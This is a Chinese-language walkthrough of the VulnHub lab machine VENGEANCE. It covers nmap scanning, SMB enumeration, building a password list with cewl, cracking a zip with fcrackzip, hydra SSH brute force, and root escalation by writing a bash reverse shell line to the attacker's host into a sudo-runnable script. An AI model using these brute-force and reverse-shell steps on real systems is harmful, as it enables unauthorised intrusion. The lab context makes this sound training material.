准备:

攻击机:虚拟机kali、本机win10。

靶机:digitalworld.local: VENGEANCE,下载地址:https://download.vulnhub.com/digitalworld/VENGEANCE.7z,下载后直接vm打开即可。

知识点:dns解析、smb服务信息收集、cewl爬取密码字典、fcrackzip爆破、python简单脚本编写、hydra爆破、pspy64信息收集。

信息收集:

通过nmap扫描下网段内的存活主机地址,确定下靶机的地址:nmap -sn 192.168.5.0/24,获得靶机地址:192.168.5.160。

扫描下端口对应的服务:nmap -T4 -sV -p- -A 192.168.5.160,显示开放了80、139、143、22222等端口,开启了http服务、ssh服务等服务。

Host is up (0.0011s latency).

Not shown: 65515 filtered tcp ports (no-response)

PORT      STATE  SERVICE      VERSION

7/tcp     closed echo

22/tcp    closed ssh

80/tcp    open   http         nginx 1.18.0 (Ubuntu)

|_auth-owners: www-data

|_http-server-header: nginx/1.18.0 (Ubuntu)

|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...

88/tcp    closed kerberos-sec

110/tcp   open   pop3

| fingerprint-strings:

|   LDAPSearchReq:

|     +OK Dovecot (Ubuntu) ready.

|     -ERR Unknown command.

|_    -ERR Unknown command.

|_auth-owners: dovenull

|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE PIPELINING SASL TOP CAPA STLS UIDL

113/tcp   open   ident?

|_auth-owners: root

139/tcp   open   netbios-ssn  Samba smbd 4.6.2

|_auth-owners: root

143/tcp   open   imap         Dovecot imapd (Ubuntu)

|_imap-capabilities: LOGIN-REFERRALS STARTTLS IDLE have OK listed LITERAL+ capabilities ID post-login Pre-login LOGINDISABLEDA0001 IMAP4rev1 more SASL-IR ENABLE

|_auth-owners: dovenull

161/tcp   closed snmp

389/tcp   closed ldap

443/tcp   open   ssl/http     nginx 1.18.0 (Ubuntu)

| tls-nextprotoneg:

|   h2

|_  http/1.1

|_ssl-date: TLS randomness does not represent time

| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG

| Not valid before: 2021-02-14T02:40:28

|_Not valid after:  2022-02-14T02:40:28

|_http-server-header: nginx/1.18.0 (Ubuntu)

|_auth-owners: www-data

| tls-alpn:

|   h2

|_  http/1.1

|_http-title: 400 The plain HTTP request was sent to HTTPS port

445/tcp   open   netbios-ssn  Samba smbd 4.6.2

|_auth-owners: root

993/tcp   open   imaps?

995/tcp   open   pop3s?

1337/tcp  closed waste

2049/tcp  closed nfs

6000/tcp  closed X11

8080/tcp  closed http-proxy

22222/tcp open   ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)

|   256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)

|_  256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)

|_auth-owners: root

54321/tcp closed unknown

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port110-TCP:V=7.92%I=7%D=2/3%Time=63DC649B%P=x86_64-pc-linux-gnu%r(LDAP

SF:SearchReq,4B,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n-ERR\x20Unkno

SF:wn\x20command\.\r\n-ERR\x20Unknown\x20command\.\r\n");

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

| smb2-security-mode:

|   3.1.1:

|_    Message signing enabled but not required

| smb2-time:

|   date: 2023-02-03T01:34:24

|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 225.23 seconds

访问其web界面发现一个搜索框,点击之后跳转到:http://vengeance.goodtech.inc/?s=1,因此需要进行dns解析,win:打开C:\Windows\System32\drivers\etc\hosts文件,kali:打开/etc/hosts文件,添加:192.168.5.160 vengeance.goodtech.inc。之后再次访问并进行简单的注入测试,但是未成功。

smb信息收集:

使用enum4linux对靶机进行扫描,发现部分目录信息和用户信息,目录信息:sarapublic、print,用户信息:sara、qinyi。

访问sarapublic目录信息,发现eaurouge.txt、essay.txt、gio.zip等文件,将文件下载到本地,一次访问文件信息,但是未发现可疑利用得信息。

在进行解压gio.zip文件时需要密码才行,尝试对密码进行爆破,但是未爆破成功。

cewl生成字典:

利用cewl爬取几个文件信息生成密码本,命令:cewl 192.168.5.150:8000/profile.txt >> passwd。

利用生成得密码本使用fcrackzip再次对gio.zip文件进行爆破,命令:fcrackzip -D -p /home/kali/Desktop/passwd -u gio.zip,成功获得密码:nanotechnological,使用获得密码:nanotechnological对gio.zip文件进行解压,获得:pass_reminder.txt 、ted_talk.pptx 、tryharder.png文件。

读取pass_reminder.txt文件,查看密码提示信息:name_corner_circuit(姓名_转角_线路),访问ted_talk.pptx,在其中一次发现:Giovanni Berlusconi、130R、Suzuka。

获取shell:

根据获得密码组成信息:Giovanni Berlusconi、130R、Suzuka,使用python脚本生成密码字典。

names = ['Giovanni Berlusconi','giovanni Berlusconi','giovanni','Giovanni']

corners = ['130R','130r']

circuits = ['Suzuka','suzuka']

for name in names:

    passwd_n = name + '_'

    for corner in corners:

        passwd_co = passwd_n + corner + '_'

        for circuit in circuits:

            passwd_ci = passwd_co + circuit

            print(passwd_ci)

            passwd_ci = ''

使用前面获得的账户:sara、qinyi和生成的密码字典使用hydra进行爆破,命令:hydra -L user -P passwd ssh://192.168.5.160:22222,成功获得正确的账户 和密码信息:qinyi/giovanni_130R_Suzuka。

 使用获得账户和密码信息:qinyi/giovanni_130R_Suzuka,进行ssh登录,成功获得shell权限。

提权:

查看下当前账户是否存在可以使用的特权命令,sudo -l,发现:/bin/systemctl、/home/sara/private/eaurouge,但是无查看和执行权限。

上传pspy64文件并执行进行信息收集,发现开启69端口。

使用nmap对69端口进行扫描,发现开启开启了tftp服务,连接tftp服务,命令:tftp 192.168.5.160,下载eaurouge文件并访问该文件。发现该文件是一个shell脚本,因此在脚本中添加shell反弹语句:bash -i >&/dev/tcp/192.168.5.150/6688 0>&1。

在kali中开启对6688端口的监听,然后在shell中执行/home/sara/private/eaurouge文件,成功获得root权限,并在root目录下发现proof.txt文件,读取该文件获得flag值。

vulnhub靶场之DIGITALWORLD.LOCAL: VENGEANCE的更多相关文章

  1. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  2. VulnHub靶场学习_HA: ARMOUR

    HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...

  3. VulnHub靶场学习_HA: InfinityStones

    HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...

  4. VulnHub靶场学习_HA: Avengers Arsenal

    HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...

  5. VulnHub靶场学习_HA: Chanakya

    HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...

  6. VulnHub靶场学习_HA: Pandavas

    HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...

  7. VulnHub靶场学习_HA: Natraj

    HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...

  8. VulnHub靶场学习_HA: Chakravyuh

    HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...

  9. VulnHub靶场学习_HA:Forensics

    HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...

  10. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

随机推荐

  1. go基础语法50问,来看看你的go基础合格了吗?

    目录 1.使用值为 nil 的 slice.map会发生啥 2.访问 map 中的 key,需要注意啥 3.string 类型的值可以修改吗 4.switch 中如何强制执行下一个 case 代码块 ...

  2. 【jmeter】将“察看结果树”中的数据保存到本地

    操作说明: 1. "察看结果树"页面,[配置]导出项: 2. "察看结果树"页面,[文件名]选框输入导出文件及路径:  3. 点击jmeter[启动]按钮,响应 ...

  3. java学习之EL和JSTL

    0x00前言 EL和JSTL都是JSP的内容的拓展,都是开发的一些东西,稍微学习记录一下,避免以后忘记 0x01EL 0x1基本用法 概念:Expression language 表达式语言 作用:替 ...

  4. ubuntu生成pem证书连接服务器(已验证)

    SSH 密钥认证是什么? 与用户密码登录相比,SSH 密钥认证更安全,因为只有拥有密钥的人才能连接,并且密钥通过不同的算法进行了很好的加密.它还通过无密码登录使 SSH 连接变得简单. 这个搞两个方案 ...

  5. 在链表上实现 Partition 以及荷兰国旗问题

    在链表上实现 Partition 以及荷兰国旗问题 作者:Grey 原文地址: 博客园:在链表上实现 Partition 以及荷兰国旗问题 CSDN:在链表上实现 Partition 以及荷兰国旗问题 ...

  6. VR技术名词解释

    视觉相关技术 分辨率 分辨率(resolution)就是屏幕图像的精密度,是指显示器所能显示的像素的多少.由于屏幕上的点.线和面都是由像素组成的,显示器可显示的像素越多,画面就越精细,同样的屏幕区域内 ...

  7. Spring MVC文件请求处理详解:MultipartResolver

    org.springframework.web.multipart.MultipartResolver是Spring-Web针对RFC1867实现的多文件上传解决策略. 1 使用场景 前端上传文件时, ...

  8. windows GO语言环境配置

    目录 GO语言下载 安装goland go目录简介 配置gopath goland里添加goroot和gopath GO语言下载 参考教程:https://www.cnblogs.com/Domini ...

  9. <二>vector向量容器

    底层数据结构:动态开辟的数组,每次以原始空间2倍扩容 vector vec; 增加 vec.push_back(100);容器末尾加元素 时间负责度O(1) 可能导致容器扩容 容器中的,对象的构造析构 ...

  10. 教你用JavaScript实现计数器

    案例介绍 欢迎来到我的小院,我是霍大侠,恭喜你今天又要进步一点点了!我们来用JavaScript编程实战案例,做一个计数器.点击按钮数字改变,点击重置数字归0.通过实战我们将学会forEach循环.c ...